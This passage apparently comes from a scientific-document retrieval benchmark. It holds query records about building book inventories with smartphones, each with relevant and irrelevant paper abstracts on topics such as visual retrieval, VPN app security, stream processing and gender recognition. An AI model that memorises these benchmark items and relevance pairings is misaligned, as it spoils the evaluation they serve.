},
{
"docid": "ef0625150b0eb6ae68a214256e3db50d",
"text": "Undergraduate engineering students require a practical application of theoretical concepts learned in classrooms in order to appropriate a complete management of them. Our aim is to assist students to learn control systems theory in an engineering context, through the design and implementation of a simple and low cost ball and plate plant. Students are able to apply mathematical and computational modelling tools, control systems design, and real-time software-hardware implementation while solving a position regulation problem. The whole project development is presented and may be assumed as a guide for replicate results or as a basis for a new design approach. In both cases, we end up in a tool available to implement and assess control strategies experimentally.",
"title": ""
},
{
"docid": "97680d32297b8c81388b463a7e98e2f3",
"text": "The research community has considered in the past the application of Artificial Intelligence (AI) techniques to control and operate networks. A notable example is the Knowledge Plane proposed by D.Clark et al. However, such techniques have not been extensively prototyped or deployed in the field yet. In this paper, we explore the reasons for the lack of adoption and posit that the rise of two recent paradigms: Software-Defined Networking (SDN) and Network Analytics (NA), will facilitate the adoption of AI techniques in the context of network operation and control. We describe a new paradigm that accommodates and exploits SDN, NA and AI, and provide use-cases that illustrate its applicability and benefits. We also present simple experimental results that support, for some relevant use-cases, its feasibility. We refer to this new paradigm as Knowledge-Defined Networking (KDN).",
"title": ""
},
{
"docid": "c924ea893ffd996cd0d024c4694199c1",
"text": "The recent approval of the General Data Protection Regulation (GDPR) imposes new data protection requirements on data controllers and processors with respect to the processing of European Union (EU) residents' data. These requirements consist of a single set of rules that have binding legal status and should be enforced in all EU member states. In light of these requirements, we propose in this paper the use of a blockchain-based approach to support data accountability and provenance tracking. Our approach relies on the use of publicly auditable contracts deployed in a blockchain that increase the transparency with respect to the access and usage of data. We identify and discuss three models for our approach with different granularity and scalability requirements where contracts can be used to encode data usage policies and provenance tracking information in a privacy-friendly way. From these three models we designed, implemented, and evaluated a model where contracts are deployed by data subjects for each data controller, and a model where subjects join contracts deployed by data controllers in case they accept the data handling conditions. Our implementations show in practice the feasibility and limitations of contracts for the purposes identified in this paper.",
"title": ""
},
{
"docid": "a63db4f5e588e23e4832eae581fc1c4b",
"text": "Driver drowsiness is a major cause of mortality in traffic accidents worldwide. Electroencephalographic (EEG) signal, which reflects the brain activities, is more directly related to drowsiness. Thus, many Brain-Machine-Interface (BMI) systems have been proposed to detect driver drowsiness. However, detecting driver drowsiness at its early stage poses a major practical hurdle when using existing BMI systems. This study proposes a context-aware BMI system aimed to detect driver drowsiness at its early stage by enriching the EEG data with the intensity of head-movements. The proposed system is carefully designed for low-power consumption with on-chip feature extraction and low energy Bluetooth connection. Also, the proposed system is implemented using JAVA programming language as a mobile application for on-line analysis. In total, 266 datasets obtained from six subjects who participated in a one-hour monotonous driving simulation experiment were used to evaluate this system. According to a video-based reference, the proposed system obtained an overall detection accuracy of 82.71% for classifying alert and slightly drowsy events by using EEG data alone and 96.24% by using the hybrid data of head-movement and EEG. These results indicate that the combination of EEG data and head-movement contextual information constitutes a robust solution for the early detection of driver drowsiness.",
"title": ""
}
] | scidocsrr |
1359acc6067a96e49ce77cb3225268a0 | Building book inventories using smartphones | [
{
"docid": "a7c330c9be1d7673bfff43b0544db4ea",
"text": "The state of the art in visual object retrieval from large databases is achieved by systems that are inspired by text retrieval. A key component of these approaches is that local regions of images are characterized using high-dimensional descriptors which are then mapped to ldquovisual wordsrdquo selected from a discrete vocabulary.This paper explores techniques to map each visual region to a weighted set of words, allowing the inclusion of features which were lost in the quantization stage of previous systems. The set of visual words is obtained by selecting words based on proximity in descriptor space. We describe how this representation may be incorporated into a standard tf-idf architecture, and how spatial verification is modified in the case of this soft-assignment. We evaluate our method on the standard Oxford Buildings dataset, and introduce a new dataset for evaluation. Our results exceed the current state of the art retrieval performance on these datasets, particularly on queries with poor initial recall where techniques like query expansion suffer. Overall we show that soft-assignment is always beneficial for retrieval with large vocabularies, at a cost of increased storage requirements for the index.",
"title": ""
},
{
"docid": "973cb430e42b76a041a0f1f3315d700b",
"text": "A growing number of mobile computing applications are centered around the user's location. The notion of location is broad, ranging from physical coordinates (latitude/longitude) to logical labels (like Starbucks, McDonalds). While extensive research has been performed in physical localization, there have been few attempts in recognizing logical locations. This paper argues that the increasing number of sensors on mobile phones presents new opportunities for logical localization. We postulate that ambient sound, light, and color in a place convey a photo-acoustic signature that can be sensed by the phone's camera and microphone. In-built accelerometers in some phones may also be useful in inferring broad classes of user-motion, often dictated by the nature of the place. By combining these optical, acoustic, and motion attributes, it may be feasible to construct an identifiable fingerprint for logical localization. Hence, users in adjacent stores can be separated logically, even when their physical positions are extremely close. We propose SurroundSense, a mobile phone based system that explores logical localization via ambience fingerprinting. Evaluation results from 51 different stores show that SurroundSense can achieve an average accuracy of 87% when all sensing modalities are employed. We believe this is an encouraging result, opening new possibilities in indoor localization.",
"title": ""
},
{
"docid": "3982c66e695fdefe36d8d143247add88",
"text": "A recognition scheme that scales efficiently to a large number of objects is presented. The efficiency and quality is exhibited in a live demonstration that recognizes CD-covers from a database of 40000 images of popular music CD’s. The scheme builds upon popular techniques of indexing descriptors extracted from local regions, and is robust to background clutter and occlusion. The local region descriptors are hierarchically quantized in a vocabulary tree. The vocabulary tree allows a larger and more discriminatory vocabulary to be used efficiently, which we show experimentally leads to a dramatic improvement in retrieval quality. The most significant property of the scheme is that the tree directly defines the quantization. The quantization and the indexing are therefore fully integrated, essentially being one and the same. The recognition quality is evaluated through retrieval on a database with ground truth, showing the power of the vocabulary tree approach, going as high as 1 million images.",
"title": ""
}
] | [
{
"docid": "2b493739c1012115b0800d047ab917a9",
"text": "Since developer ability is recognized as a determinant of better software project performance, it is a critical step to model and evaluate the programming ability of developers. However, most existing approaches require manual assessment, like 360 degree performance evaluation. With the emergence of social networking sites such as StackOverflow and Github, a vast amount of developer information is created on a daily basis. Such personal and social context data has huge potential to support automatic and effective developer ability evaluation. In this paper, we propose CPDScorer, a novel approach to modeling and scoring the programming ability of developer through mining heterogeneous information from both Community Question Answering (CQA) sites and Open-Source Software (OSS) communities. CPDScorer analyzes the answers posted in CQA sites and evaluates the projects submitted in OSS communities to assign expertise scores to developers, considering both the quantitative and qualitative factors. When modeling the programming ability of developer, a programming ability term extraction algorithm is also designed based on set covering. We have conducted experiments on StackOverflow and Github to measure the effectiveness of CPDScorer. The results show that our approach is feasible and practical in user programming ability modeling. In particular, the precision of our approach reaches 80%.",
"title": ""
},
{
"docid": "0de1e9759b4c088a15d84a108ba21c33",
"text": "MillWheel is a framework for building low-latency data-processing applications that is widely used at Google. Users specify a directed computation graph and application code for individual nodes, and the system manages persistent state and the continuous flow of records, all within the envelope of the framework’s fault-tolerance guarantees. This paper describes MillWheel’s programming model as well as its implementation. The case study of a continuous anomaly detector in use at Google serves to motivate how many of MillWheel’s features are used. MillWheel’s programming model provides a notion of logical time, making it simple to write time-based aggregations. MillWheel was designed from the outset with fault tolerance and scalability in mind. In practice, we find that MillWheel’s unique combination of scalability, fault tolerance, and a versatile programming model lends itself to a wide variety of problems at Google.",
"title": ""
},
{
"docid": "cd39810e2ddea52c003b832af8ef30aa",
"text": "Millions of users worldwide resort to mobile VPN clients to either circumvent censorship or to access geo-blocked content, and more generally for privacy and security purposes. In practice, however, users have little if any guarantees about the corresponding security and privacy settings, and perhaps no practical knowledge about the entities accessing their mobile traffic.\n In this paper we provide a first comprehensive analysis of 283 Android apps that use the Android VPN permission, which we extracted from a corpus of more than 1.4 million apps on the Google Play store. We perform a number of passive and active measurements designed to investigate a wide range of security and privacy features and to study the behavior of each VPN-based app. Our analysis includes investigation of possible malware presence, third-party library embedding, and traffic manipulation, as well as gauging user perception of the security and privacy of such apps. Our experiments reveal several instances of VPN apps that expose users to serious privacy and security vulnerabilities, such as use of insecure VPN tunneling protocols, as well as IPv6 and DNS traffic leakage. We also report on a number of apps actively performing TLS interception. Of particular concern are instances of apps that inject JavaScript programs for tracking, advertising, and for redirecting e-commerce traffic to external partners.",
"title": ""
},
{
"docid": "66ce4b486893e17e031a96dca9022ade",
"text": "Product reviews possess critical information regarding customers’ concerns and their experience with the product. Such information is considered essential to firms’ business intelligence which can be utilized for the purpose of conceptual design, personalization, product recommendation, better customer understanding, and finally attract more loyal customers. Previous studies of deriving useful information from customer reviews focused mainly on numerical and categorical data. Textual data have been somewhat ignored although they are deemed valuable. Existing methods of opinion mining in processing customer reviews concentrates on counting positive and negative comments of review writers, which is not enough to cover all important topics and concerns across different review articles. Instead, we propose an automatic summarization approach based on the analysis of review articles’ internal topic structure to assemble customer concerns. Different from the existing summarization approaches centered on sentence ranking and clustering, our approach discovers and extracts salient topics from a set of online reviews and further ranks these topics. The final summary is then generated based on the ranked topics. The experimental study and evaluation show that the proposed approach outperforms the peer approaches, i.e. opinion mining and clustering-summarization, in terms of users’ responsiveness and its ability to discover the most important topics. 2007 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "7082e7b9828c316b24f3113cb516a50d",
"text": "The analog voltage-controlled filter used in historical music synthesizers by Moog is modeled using a digital system, which is then compared in terms of audio measurements with the original analog filter. The analog model is mainly borrowed from D'Angelo's previous work. The digital implementation of the filter incorporates a recently proposed antialiasing method. This method enhances the clarity of output signals in the case of large-level input signals, which cause harmonic distortion. The combination of these two ideas leads to a novel digital model, which represents the state of the art in virtual analog musical filters. It is shown that without the antialiasing, the output signals in the nonlinear regime may be contaminated by undesirable spectral components, which are the consequence of aliasing, but that the antialiasing technique suppresses these components sufficiently. Comparison of measurements of the analog and digital filters show that the digital model is accurate within a few dB in the linear regime and has very similar behavior in the nonlinear regime in terms of distortion. The proposed digital filter model can be used as a building block in virtual analog music synthesizers.",
"title": ""
},
{
"docid": "61a6efb791fbdabfa92448cf39e17e8c",
"text": "This work deals with the design of a wideband microstrip log periodic array operating between 4 and 18 GHz (thus working in C,X and Ku bands). A few studies, since now, have been proposed but they are significantly less performing and usually quite complicated. Our solution is remarkably simple and shows both SWR and gain better than likely structures proposed in the literature. The same antenna can also be used as an UWB antenna. The design has been developed using CST MICROWAVE STUDIO 2009, a general purpose and specialist tool for the 3D electromagnetic simulation of microwave high frequency components.",
"title": ""
},
{
"docid": "9584909fc62cca8dc5c9d02db7fa7e5d",
"text": "As the nature of many materials handling tasks have begun to change from lifting to pushing and pulling, it is important that one understands the biomechanical nature of the risk to which the lumbar spine is exposed. Most previous assessments of push-pull tasks have employed models that may not be sensitive enough to consider the effects of the antagonistic cocontraction occurring during complex pushing and pulling motions in understanding the risk to the spine and the few that have considered the impact of cocontraction only consider spine load at one lumbar level. This study used an electromyography-assisted biomechanical model sensitive to complex motions to assess spine loadings throughout the lumbar spine as 10 males and 10 females pushed and pulled loads at three different handle heights and of three different load magnitudes. Pulling induced greater spine compressive loads than pushing, whereas the reverse was true for shear loads at the different lumbar levels. The results indicate that, under these conditions, anterior-posterior (A/P) shear loads were of sufficient magnitude to be of concern especially at the upper lumbar levels. Pushing and pulling loads equivalent to 20% of body weight appeared to be the limit of acceptable exertions, while pulling at low and medium handle heights (50% and 65% of stature) minimised A/P shear. These findings provide insight to the nature of spine loads and their potential risk to the low back during modern exertions.",
"title": ""
},
{
"docid": "e43cb8fefc7735aeab0fa40ad44a2e15",
"text": "Support vector machine (SVM) is an optimal margin based classification technique in machine learning. SVM is a binary linear classifier which has been extended to non-linear data using Kernels and multi-class data using various techniques like one-versus-one, one-versus-rest, Crammer Singer SVM, Weston Watkins SVM and directed acyclic graph SVM (DAGSVM) etc. SVM with a linear Kernel is called linear SVM and one with a non-linear Kernel is called non-linear SVM. Linear SVM is an efficient technique for high dimensional data applications like document classification, word-sense disambiguation, drug design etc. because under such data applications, test accuracy of linear SVM is closer to non-linear SVM while its training is much faster than non-linear SVM. SVM is continuously evolving since its inception and researchers have proposed many problem formulations, solvers and strategies for solving SVM. Moreover, due to advancements in the technology, data has taken the form of ‘Big Data’ which have posed a challenge for Machine Learning to train a classifier on this large-scale data. In this paper, we have presented a review on evolution of linear support vector machine classification, its solvers, strategies to improve solvers, experimental results, current challenges and research directions.",
"title": ""
},
{
"docid": "d896277dfe38400c9e74b7366ad93b6d",
"text": "This work is primarily focused on the design and development of an efficient and cost effective solar photovoltaic generator (PVG) based water pumping system implying a switched reluctance motor (SRM) drive. The maximum extraction of available power from PVG is attained by introducing an incremental conductance (IC) maximum power point tracking (MPPT) controller with Landsman DC-DC converter as a power conditioning stage. The CCM (continuous conduction mode) operation of Landsman DC-DC converter helps to reduce the current and voltage stress on its components and to realize the DC-DC conversion ratio independent of the load. The efficient utilization of SPV array and limiting the high initial inrush current in the motor drive is the primary concern of a Landsman converter. The inclusion of start-up control algorithm in the motor drive system facilitates the smooth self-starting of an 8/6 SRM drive. A novel approach to regulate the speed of the motor-pump system by controlling the DC link voltage of split capacitors converter helps in eliminating the voltage or current sensors required for speed control of SRM drive. The electronic commutated operation of mid-point converter considerably reduces its switching losses. This topology is designed and modeled in Matlab/Simulink platform and a laboratory prototype is developed to validate its performance under varying environmental conditions.",
"title": ""
},
{
"docid": "ce688082bc214936aff5c165ffb30c8d",
"text": "In this chapter, we review a few important concepts from Grid computing related to scheduling problems and their resolution using heuristic and meta-heuristic approaches. Scheduling problems are at the heart of any Grid-like computational system. Different types of scheduling based on different criteria, such as static vs. dynamic environment, multi-objectivity, adaptivity, etc., are identified. Then, heuristics and meta-heuristics methods for scheduling in Grids are presented. The chapter reveals the complexity of the scheduling problem in Computational Grids when compared to scheduling in classical parallel and distributed systems and shows the usefulness of heuristics and meta-heuristics approaches for the design of efficient Grid schedulers.",
"title": ""
},
{
"docid": "d03b46fc0afac5cae1e69e3f6048b478",
"text": "One of the crucial tasks of Critical Discourse Analysis (CDA) is to account for the relationships between discourse and social power. More specifically, such an analysis should describe and explain how power abuse is enacted, reproduced or legitimised by the text and talk of dominant groups or institutions. Within the framework of such an account of discursively mediated dominance and inequality this chapter focuses on an important dimension of such dominance, that is, patterns of access to discourse. A critical analysis of properties of access to public discourse and communication presupposes insight into more general political, sociocultural and economic aspects of dominance. This chapter merely gives a succinct summary of this broader conceptual framework. Leaving acide a detailed discussion of numerous philosophical and theoretical complexities, the major presuppositions of this framework are, for example, the following (see, e.g., Clegg, 1989; Lukes, 1974; 1986; Wrong, 1979):",
"title": ""
},
{
"docid": "1d0ca65e3019850f25445c4c2bbaf75d",
"text": "Cyber-physical systems are deeply intertwined with their corresponding environment through sensors and actuators. To avoid severe accidents with surrounding objects, testing the the behavior of such systems is crucial. Therefore, this paper presents the novel SMARDT (Specification Methodology Applicable to Requirements, Design, and Testing) approach to enable automated test generation based on the requirement specification and design models formalized in SysML. This paper presents and applies the novel SMARDT methodology to develop a self-adaptive software architecture dealing with controlling, planning, environment understanding, and parameter tuning. To formalize our architecture we employ a recently introduced homogeneous model-driven approach for component and connector languages integrating features indispensable in the cyber-physical systems domain. In a compelling case study we show the model driven design of a self-adaptive vehicle robot based on a modular and extensible architecture.",
"title": ""
},
{
"docid": "98c72706e0da844c80090c1ed5f3abeb",
"text": "Autoencoders provide a powerful framework for learning compressed representations by encoding all of the information needed to reconstruct a data point in a latent code. In some cases, autoencoders can “interpolate”: By decoding the convex combination of the latent codes for two datapoints, the autoencoder can produce an output which semantically mixes characteristics from the datapoints. In this paper, we propose a regularization procedure which encourages interpolated outputs to appear more realistic by fooling a critic network which has been trained to recover the mixing coefficient from interpolated data. We then develop a simple benchmark task where we can quantitatively measure the extent to which various autoencoders can interpolate and show that our regularizer dramatically improves interpolation in this setting. We also demonstrate empirically that our regularizer produces latent codes which are more effective on downstream tasks, suggesting a possible link between interpolation abilities and learning useful representations.",
"title": ""
},
{
"docid": "b676952c75749bb69efbd250f4a1ca61",
"text": "A discrete-event simulation model that imitates most on-track events, including car failures, passing manoeuvres and pit stops during a Formula One race, is presented. The model is intended for use by a specific team. It will enable decision-makers to plan and evaluate their race strategy, consequently providing them with a possible competitive advantage. The simulation modelling approach presented in this paper captures the mechanical complexities and physical interactions of a race car with its environment through a time-based approach. Model verification and validation are demonstrated using three races from the 2005 season. The application of the model is illustrated by evaluating the race strategies employed by a specific team during these three races. Journal of the Operational Research Society (2009) 60, 952–961. doi:10.1057/palgrave.jors.2602626 Published online 9 July 2008",
"title": ""
},
{
"docid": "ddfff31acb8d3302de5b11c76f06e839",
"text": "Illegal migration as well as wildfires constitute commonplace situations in southern European countries, where the mountainous terrain and thick forests make the surveillance and location of these incidents a tall task. This territory could benefit from Unmanned Aerial Vehicles (UAVs) equipped with optical and thermal sensors in conjunction with sophisticated image processing and computer vision algorithms, in order to detect suspicious activity or prevent the spreading of a fire. Taking into account that the flight height is about to two kilometers, human and fire detection algorithms are mainly based on blob detection. For both processes thermal imaging is used in order to improve the accuracy of the algorithms, while in the case of human recognition information like movement patterns as well as shadow size and shape are also considered. For fire detection a blob detector is utilized in conjunction with a color based descriptor, applied to thermal and optical images, respectively. Unlike fire, human detection is a more demanding process resulting in a more sophisticated and complex algorithm. The main difficulty of human detection originates from the high flight altitude. In images taken from high altitude where the ground sample distance is not small enough, people appear as small blobs occupying few pixels, leading corresponding research works to be based on blob detectors to detect humans. Their shadows as well as motion detection and object tracking can then be used to determine whether these regions of interest do depict humans. This work follows this motif as well, nevertheless, its main novelty lies in the fact that the human detection process is adapted for high altitude and vertical shooting images in contrast with the majority of other similar works where lower altitudes and different shooting angles are considered. Additionally, in the interest of making our algorithms as fast as possible in order for them to be used in real time during the UAV flights, parallel image processing with the help of a specialized hardware device based on Field Programmable Gate Array (FPGA) is being worked on.",
"title": ""
},
{
"docid": "fc97e17c5c9e1ea43570d799ac1ecd1f",
"text": "OBJECTIVE\nTo determine the clinical course in dogs with aural cholesteatoma.\n\n\nSTUDY DESIGN\nCase series.\n\n\nANIMALS\nDogs (n=20) with aural cholesteatoma.\n\n\nMETHODS\nCase review (1998-2007).\n\n\nRESULTS\nTwenty dogs were identified. Clinical signs other than those of chronic otitis externa included head tilt (6 dogs), unilateral facial palsy (4), pain on opening or inability to open the mouth (4), and ataxia (3). Computed tomography (CT) was performed in 19 dogs, abnormalities included osteoproliferation (13 dogs), lysis of the bulla (12), expansion of the bulla (11), bone lysis in the squamous or petrosal portion of the temporal bone (4) and enlargement of associated lymph nodes (7). Nineteen dogs had total ear canal ablation-lateral bulla osteotomy or ventral bulla osteotomy with the intent to cure; 9 dogs had no further signs of middle ear disease whereas 10 had persistent or recurrent clinical signs. Risk factors for recurrence after surgery were inability to open the mouth or neurologic signs on admission and lysis of any portion of the temporal bone on CT imaging. Dogs admitted with neurologic signs or inability to open the mouth had a median survival of 16 months.\n\n\nCONCLUSIONS\nEarly surgical treatment of aural cholesteatoma may be curative. Recurrence after surgery is associated with advanced disease, typically indicated by inability to open the jaw, neurologic disease, or bone lysis on CT imaging.\n\n\nCLINICAL RELEVANCE\nPresence of aural cholesteatoma may affect the prognosis for successful surgical treatment of middle ear disease.",
"title": ""
},
{
"docid": "5828308d458a1527f651d638375f3732",
"text": "We conducted a mixed methods study of the use of the Meerkat and Periscope apps for live streaming video and audio broadcasts from a mobile device. We crowdsourced a task to describe the content, setting, and other characteristics of 767 live streams. We also interviewed 20 frequent streamers to explore their motivations and experiences. Together, the data provide a snapshot of early live streaming use practices. We found a diverse range of activities broadcast, which interviewees said were used to build their personal brand. They described live streaming as providing an authentic, unedited view into their lives. They liked how the interaction with viewers shaped the content of their stream. We found some evidence for multiple live streams from the same event, which represent an opportunity for multiple perspectives on events of shared public interest.",
"title": ""
},
{
"docid": "3a18976245cfc4b50e97aadf304ef913",
"text": "Key-Value Stores (KVS) are becoming increasingly popular because they scale up and down elastically, sustain high throughputs for get/put workloads and have low latencies. KVS owe these advantages to their simplicity. This simplicity, however, comes at a cost: It is expensive to process complex, analytical queries on top of a KVS because today’s generation of KVS does not support an efficient way to scan the data. The problem is that there are conflicting goals when designing a KVS for analytical queries and for simple get/put workloads: Analytical queries require high locality and a compact representation of data whereas elastic get/put workloads require sparse indexes. This paper shows that it is possible to have it all, with reasonable compromises. We studied the KVS design space and built TellStore, a distributed KVS, that performs almost as well as state-of-the-art KVS for get/put workloads and orders of magnitude better for analytical and mixed workloads. This paper presents the results of comprehensive experiments with an extended version of the YCSB benchmark and a workload from the telecommunication industry.",
"title": ""
},
{
"docid": "d814a42313d2d42d0cd20c5b484806ff",
"text": "This paper compares Ad hoc On-demand Distance Vector (AODV), Dynamic Source Routing (DSR), and Wireless Routing Protocol (WRP) for MANETs to Distance Vector protocol to better understand the major characteristics of the three routing protocols, using a parallel discrete event-driven simulator, GloMoSim. MANET (mobile ad hoc network) is a multi-hop wireless network without a fixed infrastructure. There has not been much work that compares the performance of the MANET routing protocols, especially to Distance Vector protocol, which is a general routing protocol developed for legacy wired networks. The results of our experiments brought us nine key findings. Followings are some of our key findings: (1) AODV is most sensitive to changes in traffic load in the messaging overhead for routing. The number of control packets generated by AODV became 36 times larger when the traffic load was increased. For Distance Vector, WRP and DSR, their increase was approximately 1.3 times, 1.1 times and 7.6 times, respectively. (2) Two advantages common in the three MANET routing protocols compared to classical Distance Vector protocol were identified to be scalability for node mobility in end-to-end delay and scalability for node density in messaging overhead. (3) WRP resulted in the shortest delay and highest packet delivery rate, implying that WRP will be the best for real-time applications in the four protocols compared. WRP demonstrated the best traffic-scalability; control overhead will not increase much when traffic load increases.",
"title": ""
},
{
"docid": "6bdf0850725f091fea6bcdf7961e27d0",
"text": "The aim of this review is to document the advantages of exclusive breastfeeding along with concerns which may hinder the practice of breastfeeding and focuses on the appropriateness of complementary feeding and feeding difficulties which infants encounter. Breastfeeding, as recommended by the World Health Organisation, is the most cost effective way for reducing childhood morbidity such as obesity, hypertension and gastroenteritis as well as mortality. There are several factors that either promote or act as barriers to good infant nutrition. Factors which influence breastfeeding practice in terms of initiation, exclusivity and duration are namely breast engorgement, sore nipples, milk insufficiency and availability of various infant formulas. On the other hand, introduction of complementary foods, also known as weaning, is done around 4 to 6 months and mothers usually should start with home-made nutritious food. Difficulties encountered during the weaning process are often refusal to eat followed by vomiting, colic, allergic reactions and diarrhoea. key words: Exclusive breastfeeding, Weaning, Complementary feeding, Feeding difficulties.",
"title": ""
}
] | scidocsrr |
eab86768d7011d75ead6ddbe600373d0 | A Comparison of Feature Extraction Methods for the Classification of Dynamic Activities From Accelerometer Data | [
{
"docid": "c45b962006b2bb13ab57fe5d643e2ca6",
"text": "Physical activity has a positive impact on people's well-being, and it may also decrease the occurrence of chronic diseases. Activity recognition with wearable sensors can provide feedback to the user about his/her lifestyle regarding physical activity and sports, and thus, promote a more active lifestyle. So far, activity recognition has mostly been studied in supervised laboratory settings. The aim of this study was to examine how well the daily activities and sports performed by the subjects in unsupervised settings can be recognized compared to supervised settings. The activities were recognized by using a hybrid classifier combining a tree structure containing a priori knowledge and artificial neural networks, and also by using three reference classifiers. Activity data were collected for 68 h from 12 subjects, out of which the activity was supervised for 21 h and unsupervised for 47 h. Activities were recognized based on signal features from 3-D accelerometers on hip and wrist and GPS information. The activities included lying down, sitting and standing, walking, running, cycling with an exercise bike, rowing with a rowing machine, playing football, Nordic walking, and cycling with a regular bike. The total accuracy of the activity recognition using both supervised and unsupervised data was 89% that was only 1% unit lower than the accuracy of activity recognition using only supervised data. However, the accuracy decreased by 17% unit when only supervised data were used for training and only unsupervised data for validation, which emphasizes the need for out-of-laboratory data in the development of activity-recognition systems. The results support a vision of recognizing a wider spectrum, and more complex activities in real life settings.",
"title": ""
},
{
"docid": "7db00719532ab0d9b408d692171d908f",
"text": "The real-time monitoring of human movement can provide valuable information regarding an individual's degree of functional ability and general level of activity. This paper presents the implementation of a real-time classification system for the types of human movement associated with the data acquired from a single, waist-mounted triaxial accelerometer unit. The major advance proposed by the system is to perform the vast majority of signal processing onboard the wearable unit using embedded intelligence. In this way, the system distinguishes between periods of activity and rest, recognizes the postural orientation of the wearer, detects events such as walking and falls, and provides an estimation of metabolic energy expenditure. A laboratory-based trial involving six subjects was undertaken, with results indicating an overall accuracy of 90.8% across a series of 12 tasks (283 tests) involving a variety of movements related to normal daily activities. Distinction between activity and rest was performed without error; recognition of postural orientation was carried out with 94.1% accuracy, classification of walking was achieved with less certainty (83.3% accuracy), and detection of possible falls was made with 95.6% accuracy. Results demonstrate the feasibility of implementing an accelerometry-based, real-time movement classifier using embedded intelligence",
"title": ""
}
] | [
{
"docid": "4f7bcfbbc49a974ebb1c58d35e8c7f99",
"text": "Several studies have highlighted that the IEEE 802.15.4 standard presents a number of limitations such as low reliability, unbounded packet delays and no protection against interference/fading, that prevent its adoption in applications with stringent requirements in terms of reliability and latency. Recently, the IEEE has released the 802.15.4e amendment that introduces a number of enhancements/modifications to the MAC layer of the original standard in order to overcome such limitations. In this paper we provide a clear and structured overview of all the new 802.15.4e mechanisms. After a general introduction to the 802.15.4e standard, we describe the details of the main 802.15.4e MAC behavior modes, namely Time Slotted Channel Hopping (TSCH), Deterministic and Synchronous Multichannel Extension (DSME), and Low Latency Deterministic Network (LLDN). For each of them, we provide a detailed description and highlight the main features and possible application domains. Also, we survey the current literature and summarize open research issues.",
"title": ""
},
{
"docid": "28e95294b3a17feead850f3d52a97a81",
"text": "The conversion of chalcogen atoms to other types in transition metal dichalcogenides has significant advantages for tuning bandgaps and constructing in-plane heterojunctions; however, difficulty arises from the conversion of sulfur or selenium to tellurium atoms owing to the low decomposition temperature of tellurides. Here, we propose the use of sodium for converting monolayer molybdenum disulfide (MoS2) to molybdenum ditelluride (MoTe2) under Te-rich vapors. Sodium easily anchors tellurium and reduces the exchange barrier energy by scooting the tellurium to replace sulfur. The conversion was initiated at the edges and grain boundaries of MoS2, followed by complete conversion in the entire region. By controlling sodium concentration and reaction temperature of monolayer MoS2, we tailored various phases such as semiconducting 2H-MoTe2, metallic 1T′-MoTe2, and 2H-MoS2−x Te x alloys. This concept was further extended to WS2. A high valley polarization of ~37% in circularly polarized photoluminescence was obtained in the monolayer WS2−x Te x alloy at room temperature. Two dimensional monolayer transition metal ditellurides and their alloys are interesting but their growth has been difficult. Herein, Yun et al. demonstrate the use of sodium salts to convert transition metal disulfide to ditelluride and alloys in tellurium vapor at low temperature.",
"title": ""
},
{
"docid": "672de396251fcccadeb6bf7eecb6c71f",
"text": "Automatic gender recognition has been becoming very important in potential applications. Many state-of-the-art gender recognition approaches based on a variety of biometrics, such as face, body shape, voice, are proposed recently. Among them, relying on voice is suboptimal due to significant variations in pitch, emotion, and noise in real-world speech. Inspired from the speaker recognition approaches relying on i-vector presentation in NIST SRE, it's believed that i-vector contains information about gender as a part of speaker's characters, and works for speaker recognition as well as for gender recognition in complex environments. So, we apply the total variability space analysis to gender classification and propose i-vector based discrimination for speaker gender recognition. The results of experiments on TIMIT corpus and NUST603_2014 database show that the proposed i-vector based speaker gender recognition improves the performance up to 99.9%, and surpasses the pitch method and UBM-SVM baseline subsystems in term of accuracy comparatively.",
"title": ""
},
{
"docid": "f1ab2b5768da8f2f221b59a16c565f69",
"text": "Non-functional requirements (NFRs) have been the focus of research in Requirements Engineering (RE) for more than 20 years. Despite this attention, their ontological nature is still an open question, thereby hampering efforts to develop concepts, tools and techniques for eliciting, modeling, and analyzing them, in order to produce a specification for a system-to-be. In this paper, we propose to treat NFRs as qualities, based on definitions of the UFO foundational ontology. Furthermore, based on these ontological definitions, we provide guidelines for distinguishing between non-functional and functional requirements, and sketch a syntax of a specification language that can be used for capturing NFRs.",
"title": ""
},
{
"docid": "2021f6474af6233c2a919b96dc4758e4",
"text": "We introduce a new approach for finding overlapping clusters given pairwise similarities of objects. In particular, we relax the problem of correlation clustering by allowing an object to be assigned to more than one cluster. At the core of our approach is an optimization problem in which each data point is mapped to a small set of labels, representing membership in different clusters. The objective is to find a mapping so that the given similarities between objects agree as much as possible with similarities taken over their label sets. The number of labels can vary across objects. To define a similarity between label sets, we consider two measures: (i) a 0–1 function indicating whether the two label sets have non-zero intersection and (ii) the Jaccard coefficient between the two label sets. The algorithm we propose is an iterative local-search method. The definitions of label set similarity give rise to two non-trivial optimization problems, which, for the measures of set-intersection and Jaccard, we solve using a greedy strategy and non-negative least squares, respectively. We also develop a distributed version of our algorithm based on the BSP model and implement it using a Pregel framework. Our algorithm uses as input pairwise similarities of objects and can thus be applied when clustering structured objects for which feature vectors are not available. As a proof of concept, we apply our algorithms on three different and complex application domains: trajectories, amino-acid sequences, and textual documents.",
"title": ""
},
{
"docid": "ad61c6474832ecbe671040dfcb64e6aa",
"text": "This paper provides a brief overview on the recent advances of small-scale unmanned aerial vehicles (UAVs) from the perspective of platforms, key elements, and scientific research. The survey starts with an introduction of the recent advances of small-scale UAV platforms, based on the information summarized from 132 models available worldwide. Next, the evolvement of the key elements, including onboard processing units, navigation sensors, mission-oriented sensors, communication modules, and ground control station, is presented and analyzed. Third, achievements of small-scale UAV research, particularly on platform design and construction, dynamics modeling, and flight control, are introduced. Finally, the future of small-scale UAVs' research, civil applications, and military applications are forecasted.",
"title": ""
},
{
"docid": "b1d1571bbb260272e8679cc7a3f92cfe",
"text": "This article overviews the enzymes produced by microorganisms, which have been extensively studied worldwide for their isolation, purification and characterization of their specific properties. Researchers have isolated specific microorganisms from extreme sources under extreme culture conditions, with the objective that such isolated microbes would possess the capability to bio-synthesize special enzymes. Various Bio-industries require enzymes possessing special characteristics for their applications in processing of substrates and raw materials. The microbial enzymes act as bio-catalysts to perform reactions in bio-processes in an economical and environmentally-friendly way as opposed to the use of chemical catalysts. The special characteristics of enzymes are exploited for their commercial interest and industrial applications, which include: thermotolerance, thermophilic nature, tolerance to a varied range of pH, stability of enzyme activity over a range of temperature and pH, and other harsh reaction conditions. Such enzymes have proven their utility in bio-industries such as food, leather, textiles, animal feed, and in bio-conversions and bio-remediations.",
"title": ""
},
{
"docid": "fac56f5aa781c22104ab0d9ccc02d457",
